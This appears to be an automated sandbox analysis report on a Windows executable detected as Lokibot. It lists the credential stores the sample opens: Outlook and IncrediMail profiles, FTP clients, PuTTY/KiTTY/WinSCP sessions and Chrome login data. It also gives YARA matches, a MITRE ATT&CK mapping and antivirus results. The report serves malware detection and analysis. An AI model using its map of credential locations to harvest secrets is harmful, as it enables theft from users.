Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

Code function: 9_2_00406069 GetUserNameW,

9_2_00406069

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 00000009.00000002.545669843.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6328, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: PopPassword		9_2_0040D069
Source: C:\Users\user\Desktop\ZciowjM9hN.exe	Code function: SmtpPassword		9_2_0040D069

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\ZciowjM9hN.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: 00000009.00000002.545669843.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6976, type: MEMORYSTR
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ZciowjM9hN.exe.3c05470.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.ZciowjM9hN.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.ZciowjM9hN.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZciowjM9hN.exe PID: 6328, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	113 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	2 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ZciowjM9hN.exe	58%	Virustotal		Browse
ZciowjM9hN.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.FormBook
ZciowjM9hN.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.ZciowjM9hN.exe.3c05470.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.ZciowjM9hN.exe.3beb450.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
